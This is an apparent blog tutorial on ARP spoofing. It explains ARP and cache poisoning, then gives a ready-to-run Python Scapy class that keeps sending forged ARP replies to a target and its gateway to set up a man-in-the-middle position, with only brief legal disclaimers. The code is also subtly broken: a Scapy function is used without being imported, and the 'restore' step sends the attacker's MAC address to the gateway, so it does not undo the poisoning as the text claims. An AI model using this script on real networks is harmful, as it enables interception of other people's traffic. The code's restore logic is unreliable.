Introduction
Address Resolution Protocol (ARP) spoofing, also known as ARP poisoning, is a network attack in which an attacker sends falsified ARP messages over a local area network. This results in the linking of the attacker's MAC address with the IP address of a legitimate host, effectively diverting traffic meant for that host to the attacker instead. This article delves into the intricacies of ARP, how ARP spoofing works, and provides a detailed Python script using object-oriented programming (OOP) to simulate this attack in a controlled environment.
Understanding ARP
The Role of ARP in Networks
ARP is used for mapping a known IP address to a MAC address. When a device on a LAN wants to communicate with another device, it uses ARP to find out the physical MAC address associated with that IP address.
How ARP Works
- ARP Request: A device sends an ARP request to find the MAC address associated with an IP address.
- ARP Reply: The device owning the IP address responds with its MAC address.
- ARP Cache: Devices store this mapping in their ARP cache for future reference.
ARP Spoofing Explained
The Mechanism
- Selecting Targets: An attacker chooses the target device and the gateway/router on a LAN.
- Sending Spoofed ARP Responses: The attacker sends a falsified ARP response to the target, claiming their MAC address corresponds to the gateway's IP.
Similarly, they send a falsified response to the gateway, pretending their MAC address corresponds to the target's IP.
Goals of ARP Spoofing
- Interception: To capture or modify data between the target device and the gateway.
- Man-in-the-Middle (MitM): To position the attacker's machine between the target and the gateway.
Python Script for ARP Spoofing Using OOP
Script Overview
We'll develop a Python script that simulates ARP spoofing in a controlled environment. The script will use object-oriented programming principles to structure the code efficiently.
Required Tools
Python Environment: Python 3.x should be installed.
Scapy Library: A powerful packet manipulation tool.
Install Scapy:
pip install scapy
Script Architecture
- ARP Spoofer Class: This class will encapsulate the functionalities for ARP spoofing. Methods:
- Constructor: To initialize target and gateway IP addresses.
- Spoofing Method: To send the spoofed ARP responses.
- Restore Method: To restore the network to its original state.
Script Features
- Object-Oriented Design: Using classes to encapsulate ARP spoofing functionalities.
- Network Interface Management: Handling network interfaces for ARP spoofing.
- Continuous Spoofing with Interval Control: Continuously send ARP responses at regular intervals.
- Error Handling: Robust exception handling for network errors or interruptions.
- Network Restoration: Restoring the ARP table of the target and gateway to their original state.
- Logging: Advanced logging for tracking the spoofing process and any errors.
Code Implementation
import time
import sys
import logging
from scapy.all import ARP, send, get_if_hwaddr, get_if_addr
class ARPSpoofer:
def __init__(self, target_ip, gateway_ip, interface):
self.target_ip = target_ip
self.gateway_ip = gateway_ip
self.interface = interface
self.target_mac = self.get_mac(target_ip)
self.gateway_mac = self.get_mac(gateway_ip)
self.own_mac = get_if_hwaddr(self.interface)
def get_mac(self, ip):
response, _ = sr(ARP(op=1, hwdst="ff:ff:ff:ff:ff:ff", pdst=ip), timeout=2, retry=10, verbose=False)
for _, received in response:
return received.hwsrc
sys.exit("Could not find MAC address for IP address: {}".format(ip))
def spoof(self):
spoofed_target = ARP(op=2, psrc=self.gateway_ip, pdst=self.target_ip, hwdst=self.target_mac)
spoofed_gateway = ARP(op=2, psrc=self.target_ip, pdst=self.gateway_ip, hwdst=self.gateway_mac)
send(spoofed_target, verbose=False)
send(spoofed_gateway, verbose=False)
logging.info(f"Sent spoofed ARP responses to {self.target_ip} and {self.gateway_ip}")
def restore(self):
restore_target = ARP(op=2, psrc=self.gateway_ip, pdst=self.target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gateway_mac)
restore_gateway = ARP(op=2, psrc=self.target_ip, pdst=self.gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.own_mac)
send(restore_target, count=5, verbose=False)
send(restore_gateway, count=5, verbose=False)
logging.info("Restored the network")
def run(self):
try:
while True:
self.spoof()
# Sends spoofed ARP responses every 10 seconds
time.sleep(10)
except KeyboardInterrupt:
self.restore()
sys.exit("ARP spoofing stopped")
# Setup logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(message)s')
# Usage
# FIXME: Replace with your network interface
interface = "eth0"
# FIXME: Replace with your target IP
target_ip = "192.168.1.5"
# FIXME: Replace with your gateway IP
gateway_ip = "192.168.1.1"
spoofer = ARPSpoofer(target_ip, gateway_ip, interface)
spoofer.run()
Code Explanation
- Constructor: Initializes the ARPSpoofer object with target and gateway IP addresses.
- Spoof Method: Crafts and sends spoofed ARP responses to both the target and the gateway.
- Restore Method: Ideally, it should restore the ARP tables of the affected devices to their original state.
Security and Ethical Considerations
Legal Restrictions: Unauthorized ARP spoofing is illegal.
Ethical Hacking: Only perform ARP spoofing in a controlled environment with explicit permission.
Conclusion
ARP spoofing is a significant security concern in network environments. Understanding its mechanism is vital for cybersecurity professionals. The provided Python script serves as an educational tool to simulate ARP spoofing, emphasizing the importance of ethical practices and legal compliance in cybersecurity endeavors.
Your support is much appreciated, and makes me HIGH ;)
Top comments (0)